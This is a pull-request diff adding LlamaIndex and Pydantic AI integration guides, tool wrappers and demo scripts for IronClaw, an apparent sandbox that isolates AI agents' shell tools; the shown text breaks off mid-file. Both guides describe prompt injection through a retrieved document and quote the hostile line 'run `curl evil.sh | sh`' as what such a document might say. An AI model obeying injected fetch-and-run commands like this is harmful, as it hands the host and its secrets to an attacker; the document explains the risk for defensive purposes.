### PR TITLE
feat(examples): LlamaIndex + Pydantic AI sandbox integration examples (IRO-365)

### DIFF
--- a/docs/integrations/.nav.yml
+++ b/docs/integrations/.nav.yml
@@ -7,6 +7,8 @@ nav:
   - Sandbox any agent framework: index.md
   - LangChain: langchain.md
   - CrewAI: crewai.md
+  - LlamaIndex: llamaindex.md
+  - Pydantic AI: pydantic-ai.md
   - OpenAI Agents SDK: openai-sdk.md
   - Claude Agent SDK: claude-sdk.md
   - CI (GitHub Action): ci.md

--- a/docs/integrations/index.md
+++ b/docs/integrations/index.md
@@ -1,6 +1,6 @@
 ---
 title: "Sandbox any AI agent framework with IronClaw"
-description: You built an agent with LangChain, CrewAI, the OpenAI Agents SDK, or the Claude Agent SDK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
+description: You built an agent with LangChain, CrewAI, LlamaIndex, Pydantic AI, the OpenAI Agents SDK, or the Claude Agent SDK. Those frameworks run your agent's tools and code in your own process, on your host. IronClaw runs the same agent inside a sealed gVisor sandbox instead. One search-intent guide per framework.
 ---
 
 # Sandbox any AI agent framework with IronClaw
@@ -11,8 +11,8 @@ matters the moment the agent runs somewhere real:
 
 **When your agent runs untrusted, model-chosen code, whose machine is it running on?**
 
-With LangChain, CrewAI, the OpenAI Agents SDK, and the Claude Agent SDK, the answer
-is the same: **yours**. The tool loop runs in your process, with your API key in
+With LangChain, CrewAI, LlamaIndex, Pydantic AI, the OpenAI Agents SDK, and the
+Claude Agent SDK, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
 memory, your filesystem, and unrestricted outbound network. A single prompt
 injection inside a document the agent reads can turn a `Bash` or `ShellTool` call
 into a shell on your box.
@@ -39,6 +39,8 @@ attack in [Isolation, proven](../security-isolation.md) and the
 |---|---|
 | **LangChain** | [Sandbox your LangChain agent](langchain.md) |
 | **CrewAI** | [Sandbox your CrewAI agents](crewai.md) |
+| **LlamaIndex** | [Sandbox your LlamaIndex agent](llamaindex.md) |
+| **Pydantic AI** | [Sandbox your Pydantic AI agent](pydantic-ai.md) |
 | **OpenAI Agents SDK** | [Sandbox your OpenAI Agents SDK agent](openai-sdk.md) |
 | **Claude Agent SDK** | [Sandbox your Claude Agent SDK agent](claude-sdk.md) |
 | **A CI pipeline** | [Run IronClaw in GitHub Actions](ci.md) |

--- a/docs/integrations/llamaindex.md
+++ b/docs/integrations/llamaindex.md
@@ -1,0 +1,151 @@
+---
+title: "Sandbox your LlamaIndex agent with IronClaw"
+description: How to sandbox a LlamaIndex agent. Run your LlamaIndex agent's untrusted tool and code execution inside IronClaw's sealed gVisor sandbox, with the model key held host-side and every tool call gated and audited, plus a credential-free way to see it work first.
+---
+
+# Sandbox your LlamaIndex agent with IronClaw
+
+You built an agent with **LlamaIndex**: a model, an index or two, and a set of
+`FunctionTool`s the model can call. That is a great way to design the *behavior*.
+The problem starts when it runs somewhere real: a LlamaIndex `FunctionAgent` runs
+your tools **in your own process**, with your API key in memory and unrestricted
+outbound network. One prompt-injected instruction hidden in a retrieved document
+and that same process can read your environment, exfiltrate over the network, or
+call a tool you never intended.
+
+IronClaw runs the same job behind a **sealed sandbox** instead: no network card,
+the model key held **host-side** and never in the agent, and every privileged tool
+call routed through a human-approval gateway and an audit log. This page maps a
+LlamaIndex agent onto IronClaw one field at a time.
+
+!!! example "Runnable example"
+    A one-command LlamaIndex-to-IronClaw example lives at
+    [`examples/integrations/llamaindex`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/llamaindex):
+    a LlamaIndex agent whose tool and code execution is backed by an IronClaw
+    sandbox, with a blocked escape attempt printed at the end. It ships with the
+    integration examples. The credential-free demo below runs the same sealed loop
+    today.
+
+## The three-line fix
+
+Stop running the agent's tools in your own process. Declare the same agent to
+IronClaw and it runs inside a sealed, network-free sandbox instead:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Docs Researcher" --provider openai --model gpt-4o \
+  --instructions "Answer questions from the docs and cite sources." \
+  --tool web_search --tool http_fetch --tool read_file --yes
+```
+
+Same model, same tools, now behind a human-approval gateway and an audit log. The
+field-by-field mapping is below.
+
+!!! info "IronClaw does not run your Python in the sandbox, and that is the point"
+    IronClaw's sandbox has **no interpreter and no in-sandbox install**: you cannot
+    drop arbitrary code into it, and neither can a prompt injection. So you do not
+    *wrap* the LlamaIndex process; you re-declare the same agent (model, tools) as
+    an IronClaw agent group, and IronClaw runs it inside the sealed runtime. The
+    behavior you designed, the security posture you did not have to build. See
+    [Skills](../skills.md) and [Security and isolation](../security-isolation.md).
+
+## Why sandbox this
+
+A typical LlamaIndex agent:
+
+```python
+from llama_index.core.agent.workflow import FunctionAgent
+from llama_index.core.tools import FunctionTool
+from llama_index.llms.openai import OpenAI
+
+def run_shell(command: str) -> str:      # executes on YOUR box
+    import subprocess
+    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout
+
+llm = OpenAI(model="gpt-4o", api_key="sk-...")   # key lives in this process
+agent = FunctionAgent(tools=[FunctionTool.from_defaults(fn=run_shell)], llm=llm)
+await agent.run("summarize today's incidents")
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that can read memory or `os.environ`
+   can read `sk-...`.
+2. **Tools run with your privileges.** `run_shell` executes on your box with your
+   filesystem and network. A poisoned document that says "run `curl evil.sh | sh`"
+   is a tool call away.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+IronClaw closes all three by construction, not by convention.
+
+## See it work first (no credentials)
+
+Before porting anything, watch the sealed loop run with the offline `mock`
+provider. No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from llamaindex-land"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+You get the reply echoed back, proof that a real per-session sandbox launched and
+the answer flowed home through encrypted queues. Tear down with
+`docker compose -f docker-compose.demo.yml down`. The one-command, self-checking
+version is [`examples/hello-ironclaw`](https://github.com/IronSecCo/ironclaw/tree/main/examples/hello-ironclaw).
+
+## Port your LlamaIndex agent
+
+Map each part of the LlamaIndex agent onto an IronClaw agent group:
+
+| LlamaIndex | IronClaw | Notes |
+|---|---|---|
+| `OpenAI(model="gpt-4o")` | `--provider openai --model gpt-4o` | Any [provider](../providers/index.md): `anthropic`, `openai`, `gemini`, `local`, and more. |
+| `api_key="sk-..."` in the LLM | `OPENAI_API_KEY` set **on the host** | The key is injected by the host model-proxy on the way out. It never enters the sandbox. |
+| System prompt | `--identity` / `--soul` / `--instructions` | The agent's persona, voice, and operating rules. |
+| `FunctionTool`s (shell, retrievers, ...) | `--tool <name>` (built-in) or an MCP server | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Your own tools attach over [MCP](../mcp.md). |
+| `agent.run(...)` | a message to the agent group | Same request/response, now through the sealed queue. |
+
+A LlamaIndex agent that searches the web and writes a report becomes:
+
+```sh
+export OPENAI_API_KEY=sk-...          # host-side only; the sandbox never sees it
+export IRONCLAW_API_TOKEN=$(openssl rand -hex 32)
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+
+ironctl agent create \
+  --name "Docs Researcher" \
+  --provider openai --model gpt-4o \
+  --instructions "You answer questions from the docs and cite your sources." \
+  --tool web_search --tool http_fetch --tool write_file --yes
+```
+
+Your LlamaIndex tools that are *not* built in attach as an [MCP server](../mcp.md):
+IronClaw registers them through the same human-approval gateway, so a new tool is a
+reviewed change, not a silent capability.
+
+## What you gained
+
+- **The key left the agent.** It lives host-side and is injected per request; a
+  compromised agent has nothing to steal.
+- **`network=none` by default.** The sandbox has no NIC. The only egress is the
+  audited model-proxy socket, plus whatever hosts you explicitly allowlist.
+- **Privileged actions are gated.** Registering a tool, spawning another agent, or
+  reaching a new host flows through a human-approval gateway and lands in the
+  [audit log](../architecture.md).
+
+Same agent you designed in LlamaIndex. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/docs/integrations/pydantic-ai.md
+++ b/docs/integrations/pydantic-ai.md
@@ -1,0 +1,149 @@
+---
+title: "Sandbox your Pydantic AI agent with IronClaw"
+description: How to sandbox a Pydantic AI agent. Run your Pydantic AI agent's untrusted tool and code execution inside IronClaw's sealed gVisor sandbox, with the model key held host-side and every tool call gated and audited, plus a credential-free way to see it work first.
+---
+
+# Sandbox your Pydantic AI agent with IronClaw
+
+You built an agent with **Pydantic AI**: a model, a typed output schema, and a set
+of tools the model can call. That is a great way to design the *behavior*. The
+problem starts when it runs somewhere real: a Pydantic AI `Agent` runs your tools
+**in your own process**, with your API key in memory and unrestricted outbound
+network. One prompt-injected instruction and that same process can read your
+environment, exfiltrate over the network, or call a tool you never intended.
+
+IronClaw runs the same job behind a **sealed sandbox** instead: no network card,
+the model key held **host-side** and never in the agent, and every privileged tool
+call routed through a human-approval gateway and an audit log. This page maps a
+Pydantic AI agent onto IronClaw one field at a time.
+
+!!! example "Runnable example"
+    A one-command Pydantic-AI-to-IronClaw example lives at
+    [`examples/integrations/pydantic-ai`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/pydantic-ai):
+    a Pydantic AI agent whose tool and code execution is backed by an IronClaw
+    sandbox, with a blocked escape attempt printed at the end. It ships with the
+    integration examples. The credential-free demo below runs the same sealed loop
+    today.
+
+## The three-line fix
+
+Stop running the agent's tools in your own process. Declare the same agent to
+IronClaw and it runs inside a sealed, network-free sandbox instead:
+
+```sh
+export OPENAI_API_KEY=sk-...   # host-side only; the sandbox never sees this key
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+ironctl agent create --name "Support Triager" --provider openai --model gpt-4o \
+  --instructions "Triage support tickets and draft replies." \
+  --tool web_search --tool http_fetch --tool write_file --yes
+```
+
+Same model, same tools, now behind a human-approval gateway and an audit log. The
+field-by-field mapping is below.
+
+!!! info "IronClaw does not run your Python in the sandbox, and that is the point"
+    IronClaw's sandbox has **no interpreter and no in-sandbox install**: you cannot
+    drop arbitrary code into it, and neither can a prompt injection. So you do not
+    *wrap* the Pydantic AI process; you re-declare the same agent (model, tools) as
+    an IronClaw agent group, and IronClaw runs it inside the sealed runtime. The
+    behavior you designed, the security posture you did not have to build. See
+    [Skills](../skills.md) and [Security and isolation](../security-isolation.md).
+
+## Why sandbox this
+
+A typical Pydantic AI agent:
+
+```python
+from pydantic_ai import Agent
+
+agent = Agent("openai:gpt-4o", system_prompt="Answer with the tools you have.")
+
+@agent.tool_plain
+def run_shell(command: str) -> str:      # executes on YOUR box
+    import subprocess
+    return subprocess.run(command, shell=True, capture_output=True, text=True).stdout
+
+agent.run_sync("summarize today's incidents")   # key is in this process
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that can read memory or `os.environ`
+   can read `sk-...`.
+2. **Tools run with your privileges.** `run_shell` executes on your box with your
+   filesystem and network. A poisoned document that says "run `curl evil.sh | sh`"
+   is a tool call away.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+IronClaw closes all three by construction, not by convention.
+
+## See it work first (no credentials)
+
+Before porting anything, watch the sealed loop run with the offline `mock`
+provider. No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from pydantic-ai-land"}'
+
+sleep 3
+curl -s -H 'authorization: Bearer ironclaw-demo' \
+  http://127.0.0.1:8787/v1/ui/chat/mock-agent/messages       # the reply
+```
+
+You get the reply echoed back, proof that a real per-session sandbox launched and
+the answer flowed home through encrypted queues. Tear down with
+`docker compose -f docker-compose.demo.yml down`. The one-command, self-checking
+version is [`examples/hello-ironclaw`](https://github.com/IronSecCo/ironclaw/tree/main/examples/hello-ironclaw).
+
+## Port your Pydantic AI agent
+
+Map each part of the Pydantic AI agent onto an IronClaw agent group:
+
+| Pydantic AI | IronClaw | Notes |
+|---|---|---|
+| `Agent("openai:gpt-4o")` | `--provider openai --model gpt-4o` | Any [provider](../providers/index.md): `anthropic`, `openai`, `gemini`, `local`, and more. |
+| `OPENAI_API_KEY` in the process | `OPENAI_API_KEY` set **on the host** | The key is injected by the host model-proxy on the way out. It never enters the sandbox. |
+| `system_prompt=...` | `--identity` / `--soul` / `--instructions` | The agent's persona, voice, and operating rules. |
+| `@agent.tool` / `Tool(...)` | `--tool <name>` (built-in) or an MCP server | Built-ins: `read_file`, `write_file`, `list_dir`, `web_search`, `http_fetch`. Your own tools attach over [MCP](../mcp.md). |
+| `agent.run_sync(...)` | a message to the agent group | Same request/response, now through the sealed queue. |
+
+A Pydantic AI agent that searches the web and writes a report becomes:
+
+```sh
+export OPENAI_API_KEY=sk-...          # host-side only; the sandbox never sees it
+export IRONCLAW_API_TOKEN=$(openssl rand -hex 32)
+./bin/controlplane --dev --api-addr 127.0.0.1:8787 &
+
+ironctl agent create \
+  --name "Support Triager" \
+  --provider openai --model gpt-4o \
+  --instructions "You triage support tickets and draft replies, citing sources." \
+  --tool web_search --tool http_fetch --tool write_file --yes
+```
+
+Your Pydantic AI tools that are *not* built in attach as an [MCP server](../mcp.md):
+IronClaw registers them through the same human-approval gateway, so a new tool is a
+reviewed change, not a silent capability.
+
+## What you gained
+
+- **The key left the agent.** It lives host-side and is injected per request; a
+  compromised agent has nothing to steal.
+- **`network=none` by default.** The sandbox has no NIC. The only egress is the
+  audited model-proxy socket, plus whatever hosts you explicitly allowlist.
+- **Privileged actions are gated.** Registering a tool, spawning another agent, or
+  reaching a new host flows through a human-approval gateway and lands in the
+  [audit log](../architecture.md).
+
+Same agent you designed in Pydantic AI. A perimeter it never had.
+
+## Next
+
+- [Choose your model provider](../providers/index.md)
+- [MCP: bring your own tools](../mcp.md)
+- [Security and isolation](../security-isolation.md)

--- a/examples/integrations/README.md
+++ b/examples/integrations/README.md
@@ -15,6 +15,8 @@ foot-gun for a boundary IronClaw [proves holds](../red-team-escape/).
 |---------|-----------------|------------------|
 | [`langchain/`](langchain/) | [LangChain](https://python.langchain.com) | `examples/integrations/langchain/run.sh` |
 | [`crewai/`](crewai/) | [CrewAI](https://docs.crewai.com) | `examples/integrations/crewai/run.sh` |
+| [`llamaindex/`](llamaindex/) | [LlamaIndex](https://docs.llamaindex.ai) | `examples/integrations/llamaindex/run.sh` |
+| [`pydantic-ai/`](pydantic-ai/) | [Pydantic AI](https://ai.pydantic.dev) | `examples/integrations/pydantic-ai/run.sh` |
 | [`openai-agents/`](openai-agents/) | [OpenAI Agents SDK](https://github.com/openai/openai-agents-python) | `examples/integrations/openai-agents/run.sh` |
 | [`claude-agent-sdk/`](claude-agent-sdk/) | [Claude Agent SDK](https://github.com/anthropics/claude-agent-sdk-python) | `examples/integrations/claude-agent-sdk/run.sh` |
 
@@ -31,7 +33,7 @@ key never enters the sandbox.
 The IronClaw-specific piece is one small, standard-library client that engages a
 per-session sandbox and runs commands inside it. The examples come in two shapes:
 
-- **Framework tools** (LangChain, CrewAI) wrap the shared
+- **Framework tools** (LangChain, CrewAI, LlamaIndex, Pydantic AI) wrap the shared
   [`_shared/ironclaw_sandbox.py`](_shared/ironclaw_sandbox.py) client as a native tool
   via a thin `ironclaw_tool.py` adapter (~15-20 lines):
 

--- a/examples/integrations/llamaindex/README.md
+++ b/examples/integrations/llamaindex/README.md
@@ -1,0 +1,65 @@
+# LlamaIndex agents, sandboxed by IronClaw
+
+Your LlamaIndex agent runs untrusted, model-generated code. Point that execution
+at an **IronClaw sandbox** instead of your host and the same agent gets real code
+execution with **no network, no host filesystem, and no Docker socket** — the
+isolation boundary IronClaw [proves holds](../../red-team-escape/), not just
+promises.
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:            # engage a per-session sandbox
+    tool = make_sandbox_tool(sandbox)         # a real LlamaIndex FunctionTool
+    print(tool.call(command="id"))            # runs INSIDE the sandbox, not on your host
+    # agent = FunctionAgent(tools=[tool], llm=llm)  # ... drop into any LlamaIndex agent
+```
+
+## Try it in one command
+
+Zero credentials — the LLM side uses the offline **mock provider**, the sandbox
+is real:
+
+```sh
+examples/integrations/llamaindex/run.sh
+```
+
+It engages a live IronClaw per-session sandbox, drives the `sandboxed_shell`
+tool exactly as a LlamaIndex agent would (`tool.call(command=...)`), runs one
+benign task plus a battery of escape attempts, and prints a PASS/FAIL
+containment table:
+
+```
+  [OK ] benign task: run agent code                    ->  [exit 0] hello from inside the IronClaw sandbox uid=65532...
+  [OK ] network egress: only loopback exists           ->  [exit 0] lo
+  [OK ] network egress: DNS lookup of api.anthropic...  ->  [exit 0] NO_EGRESS
+  [OK ] host escape: Docker Engine socket is absent    ->  [exit 0] ABSENT
+  [OK ] host escape: host filesystem is not mounted    ->  [exit 0] CONTAINED
+
+RESULT: PASS -- benign code ran; every escape attempt was contained.
+```
+
+`run.sh --keep` leaves the demo running; `run.sh --attach` reuses an already-up
+demo control-plane.
+
+## Use a real LLM
+
+Set `OPENAI_API_KEY` (and uncomment `llama-index-llms-openai` in
+[`requirements.txt`](requirements.txt)) and `run.sh` drives a real
+`FunctionAgent` instead of the scripted probes. The tool — and therefore the
+isolation — is identical.
+
+## How it works
+
+- [`ironclaw_sandbox.py`](../_shared/ironclaw_sandbox.py) — engages a per-session
+  IronClaw sandbox (`ic-sbx-*`) against the demo control-plane and runs commands
+  inside it as its own non-root uid. Pure standard library.
+- [`ironclaw_tool.py`](ironclaw_tool.py) — wraps that sandbox as a LlamaIndex
+  `FunctionTool` named `sandboxed_shell`. **This is the ~15 lines you copy** to
+  swap a host code tool for a sandboxed one.
+- [`run.py`](run.py) — engages the sandbox and drives the tool.
+
+The execution primitive is the same one IronClaw's red-team harness attacks: a
+`docker exec` into the live per-session sandbox as its non-root uid. See the
+repo root [`README`](../../../README.md) for the full isolation model.

--- a/examples/integrations/llamaindex/ironclaw_tool.py
+++ b/examples/integrations/llamaindex/ironclaw_tool.py
@@ -1,0 +1,45 @@
+"""LlamaIndex tool backed by an IronClaw sandbox.
+
+Drop-in replacement for LlamaIndex's host-executing code/shell tools (e.g. a
+`FunctionTool` wrapping `subprocess.run`, or the code-interpreter tools): a
+LlamaIndex agent calls it exactly the same way, but every command runs inside an
+isolated IronClaw per-session sandbox instead of on your machine.
+
+    from ironclaw_tool import make_sandbox_tool
+    from ironclaw_sandbox import IronClawSandbox
+
+    sandbox = IronClawSandbox().__enter__()
+    tool = make_sandbox_tool(sandbox)          # a real LlamaIndex FunctionTool
+    agent = FunctionAgent(tools=[tool], llm=llm)   # ... plug into any agent
+"""
+
+from __future__ import annotations
+
+from llama_index.core.tools import FunctionTool
+
+from ironclaw_sandbox import IronClawSandbox
+
+_DESCRIPTION = (
+    "Execute a shell command inside an isolated IronClaw sandbox and return its "
+    "stdout/stderr and exit code. Use this for any code the user asks you to run. "
+    "The sandbox has no network, no access to the host filesystem, and no Docker "
+    "socket, so it is safe to run untrusted commands."
+)
+
+
+def make_sandbox_tool(sandbox: IronClawSandbox) -> FunctionTool:
+    """Wrap a live IronClaw sandbox as a LlamaIndex FunctionTool.
+
+    The sandbox handle is captured in a closure, so the tool exposes exactly one
+    argument (`command`) to the agent -- the same surface a host shell tool would.
+    """
+
+    def sandboxed_shell(command: str) -> str:
+        """Run a shell command inside the isolated IronClaw sandbox."""
+        return str(sandbox.run(command))
+
+    return FunctionTool.from_defaults(
+        fn=sandboxed_shell,
+        name="sandboxed_shell",
+        description=_DESCRIPTION,
+    )

--- a/examples/integrations/llamaindex/requirements.txt
+++ b/examples/integrations/llamaindex/requirements.txt
@@ -1,0 +1,8 @@
+# The IronClaw sandbox client is pure standard library; the only dependency this
+# example adds is LlamaIndex itself. Pinned for reproducible fresh-machine runs.
+# `llama-index-core` carries FunctionTool and the FunctionAgent workflow -- no
+# LLM integration package is needed for the default, credential-free path.
+llama-index-core>=0.12,<0.13
+
+# Optional -- only needed for the real-LLM path (set OPENAI_API_KEY):
+# llama-index-llms-openai>=0.3,<0.4

--- a/examples/integrations/llamaindex/run.py
+++ b/examples/integrations/llamaindex/run.py
@@ -1,0 +1,71 @@
+#!/usr/bin/env python3
+"""Run a LlamaIndex agent whose code execution is backed by an IronClaw sandbox.
+
+Zero credentials by default: it engages a real IronClaw per-session sandbox
+against the offline demo control-plane (mock provider) and drives the LlamaIndex
+`sandboxed_shell` tool exactly as an agent would -- one benign task plus a
+battery of escape attempts -- then prints a PASS/FAIL containment table.
+
+Set OPENAI_API_KEY to instead let a real LLM-driven FunctionAgent decide what to
+run; the tool (and therefore the isolation) is identical either way.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+# Make the shared client + demo importable (examples/integrations/_shared).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "_shared"))
+
+from containment_demo import PROBES, run_containment_demo  # noqa: E402
+from ironclaw_sandbox import IronClawSandbox  # noqa: E402
+from ironclaw_tool import make_sandbox_tool  # noqa: E402
+
+
+def drive_with_real_agent(tool) -> int:
+    """Optional: let a real LLM-driven agent decide what to run (needs a key)."""
+    import asyncio
+
+    from llama_index.core.agent.workflow import FunctionAgent
+    from llama_index.llms.openai import OpenAI
+
+    llm = OpenAI(model="gpt-4o-mini")
+    agent = FunctionAgent(
+        tools=[tool],
+        llm=llm,
+        system_prompt=(
+            "You are a helpful assistant with a `sandboxed_shell` tool. Answer the "
+            "user by running commands with it."
+        ),
+    )
+    result = asyncio.run(
+        agent.run("Run `id` and tell me which user the sandbox runs as.")
+    )
+    print(result)
+    return 0
+
+
+def main() -> int:
+    print("==> engaging an IronClaw per-session sandbox (mock provider, zero-cred)")
+    with IronClawSandbox() as sandbox:
+        print(f"    sandbox container: {sandbox.container}")
+        tool = make_sandbox_tool(sandbox)
+
+        if os.environ.get("OPENAI_API_KEY"):
+            print("==> OPENAI_API_KEY set: driving a real FunctionAgent")
+            return drive_with_real_agent(tool)
+
+        # Deterministic, zero-cred path: call the tool exactly as a LlamaIndex
+        # agent does -- tool.call(command=...) -- for each probe.
+        print(
+            f"==> driving the '{tool.metadata.name}' tool over {len(PROBES)} agent commands"
+        )
+        return run_containment_demo(
+            lambda command: str(tool.call(command=command)),
+            framework="LlamaIndex",
+        )
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/llamaindex/run.sh
+++ b/examples/integrations/llamaindex/run.sh
@@ -1,0 +1,29 @@
+#!/usr/bin/env bash
+# LlamaIndex + IronClaw sandbox -- one-command demo.
+#
+# Brings up the offline demo control-plane (mock provider -- no model key, no
+# channel tokens), then runs a LlamaIndex agent whose `sandboxed_shell` tool
+# executes inside a real IronClaw per-session sandbox. It runs one benign task
+# and a battery of escape attempts and prints a PASS/FAIL containment table.
+#
+#   examples/integrations/llamaindex/run.sh           # build + up + demo + tear down
+#   examples/integrations/llamaindex/run.sh --keep     # leave the demo running
+#   examples/integrations/llamaindex/run.sh --attach   # use an already-running demo
+#
+# Env overrides (all optional):
+#   IRONCLAW_ADDR        control-plane base URL  (default http://127.0.0.1:8787)
+#   IRONCLAW_API_TOKEN   API bearer token        (default ironclaw-demo)
+#   IRONCLAW_DEMO_AGENT  agent group id          (default mock-agent)
+#   SKIP_BUILD=1         skip the sandbox image build (assume it exists)
+#   OPENAI_API_KEY       if set, drive a real LLM agent instead of the scripted one
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+source "$SCRIPT_DIR/../_shared/demo-lifecycle.sh"
+
+ensure_demo_up "$@"
+setup_venv "$SCRIPT_DIR"
+
+echo "==> running the LlamaIndex sandbox demo"
+python "$SCRIPT_DIR/run.py"

--- a/examples/integrations/pydantic-ai/README.md
+++ b/examples/integrations/pydantic-ai/README.md
@@ -1,0 +1,63 @@
+# Pydantic AI agents, sandboxed by IronClaw
+
+Your Pydantic AI agent runs untrusted, model-generated code. Point that execution
+at an **IronClaw sandbox** instead of your host and the same agent gets real code
+execution with **no network, no host filesystem, and no Docker socket** — the
+isolation boundary IronClaw [proves holds](../../red-team-escape/), not just
+promises.
+
+```python
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:            # engage a per-session sandbox
+    tool = make_sandbox_tool(sandbox)         # a real Pydantic AI Tool
+    print(tool.function(command="id"))        # runs INSIDE the sandbox, not on your host
+    # agent = Agent("openai:gpt-4o", tools=[tool])  # ... drop into any Pydantic AI agent
+```
+
+## Try it in one command
+
+Zero credentials — the LLM side uses the offline **mock provider**, the sandbox
+is real:
+
+```sh
+examples/integrations/pydantic-ai/run.sh
+```
+
+It engages a live IronClaw per-session sandbox, drives the `sandboxed_shell`
+tool exactly as a Pydantic AI agent would, runs one benign task plus a battery of
+escape attempts, and prints a PASS/FAIL containment table:
+
+```
+  [OK ] benign task: run agent code                    ->  [exit 0] hello from inside the IronClaw sandbox uid=65532...
+  [OK ] network egress: only loopback exists           ->  [exit 0] lo
+  [OK ] network egress: DNS lookup of api.anthropic...  ->  [exit 0] NO_EGRESS
+  [OK ] host escape: Docker Engine socket is absent    ->  [exit 0] ABSENT
+  [OK ] host escape: host filesystem is not mounted    ->  [exit 0] CONTAINED
+
+RESULT: PASS -- benign code ran; every escape attempt was contained.
+```
+
+`run.sh --keep` leaves the demo running; `run.sh --attach` reuses an already-up
+demo control-plane.
+
+## Use a real LLM
+
+Set `OPENAI_API_KEY` (and switch `requirements.txt` to `pydantic-ai-slim[openai]`)
+and `run.sh` drives a real Pydantic AI `Agent` instead of the scripted probes. The
+tool — and therefore the isolation — is identical.
+
+## How it works
+
+- [`ironclaw_sandbox.py`](../_shared/ironclaw_sandbox.py) — engages a per-session
+  IronClaw sandbox (`ic-sbx-*`) against the demo control-plane and runs commands
+  inside it as its own non-root uid. Pure standard library.
+- [`ironclaw_tool.py`](ironclaw_tool.py) — wraps that sandbox as a Pydantic AI
+  `Tool` named `sandboxed_shell`. **This is the ~15 lines you copy** to swap a
+  host shell tool for a sandboxed one.
+- [`run.py`](run.py) — engages the sandbox and drives the tool.
+
+The execution primitive is the same one IronClaw's red-team harness attacks: a
+`docker exec` into the live per-session sandbox as its non-root uid. See the
+repo root [`README`](../../../README.md) for the full isolation model.

--- a/examples/integrations/pydantic-ai/ironclaw_tool.py
+++ b/examples/integrations/pydantic-ai/ironclaw_tool.py
@@ -1,0 +1,47 @@
+"""Pydantic AI tool backed by an IronClaw sandbox.
+
+Drop-in replacement for a host-executing shell/code tool on a Pydantic AI agent
+(a `@agent.tool_plain` that shells out, a code interpreter, ...): the agent calls
+it exactly the same way, but every command runs inside an isolated IronClaw
+per-session sandbox instead of on your machine.
+
+    from ironclaw_tool import make_sandbox_tool
+    from ironclaw_sandbox import IronClawSandbox
+
+    sandbox = IronClawSandbox().__enter__()
+    tool = make_sandbox_tool(sandbox)          # a real Pydantic AI Tool
+    agent = Agent("openai:gpt-4o", tools=[tool])   # ... plug into any agent
+"""
+
+from __future__ import annotations
+
+from pydantic_ai import Tool
+
+from ironclaw_sandbox import IronClawSandbox
+
+_DESCRIPTION = (
+    "Execute a shell command inside an isolated IronClaw sandbox and return its "
+    "stdout/stderr and exit code. Use this for any code the user asks you to run. "
+    "The sandbox has no network, no access to the host filesystem, and no Docker "
+    "socket, so it is safe to run untrusted commands."
+)
+
+
+def make_sandbox_tool(sandbox: IronClawSandbox) -> Tool:
+    """Wrap a live IronClaw sandbox as a Pydantic AI Tool.
+
+    The sandbox handle is captured in a closure, so the tool exposes exactly one
+    argument (`command`) to the agent -- the same surface a host shell tool would.
+    Pydantic AI derives the JSON schema Pydantic AI hands the model from the
+    function signature and docstring.
+    """
+
+    def sandboxed_shell(command: str) -> str:
+        """Run a shell command inside the isolated IronClaw sandbox.
+
+        Args:
+            command: The shell command to run inside the sandbox.
+        """
+        return str(sandbox.run(command))
+
+    return Tool(sandboxed_shell, name="sandboxed_shell", description=_DESCRIPTION)

--- a/examples/integrations/pydantic-ai/requirements.txt
+++ b/examples/integrations/pydantic-ai/requirements.txt
@@ -1,0 +1,8 @@
+# The IronClaw sandbox client is pure standard library; the only dependency this
+# example adds is Pydantic AI itself. `pydantic-ai-slim` carries the core `Tool`
+# and `Agent` types with no model-provider extras, which is all the default,
+# credential-free path needs. Pinned for reproducible fresh-machine runs.
+pydantic-ai-slim>=0.0.15,<1.0
+
+# Optional -- only needed for the real-LLM path (set OPENAI_API_KEY):
+# pydantic-ai-slim[openai]>=0.0.15,<1.0

--- a/examples/integrations/pydantic-ai/run.py
+++ b/examples/integrations/pydantic-ai/run.py
@@ -1,0 +1,63 @@
+#!/usr/bin/env python3
+"""Run a Pydantic AI agent whose code execution is backed by an IronClaw sandbox.
+
+Zero credentials by default: it engages a real IronClaw per-session sandbox
+against the offline demo control-plane (mock provider) and drives the Pydantic AI
+`sandboxed_shell` tool exactly as an agent would -- one benign task plus a
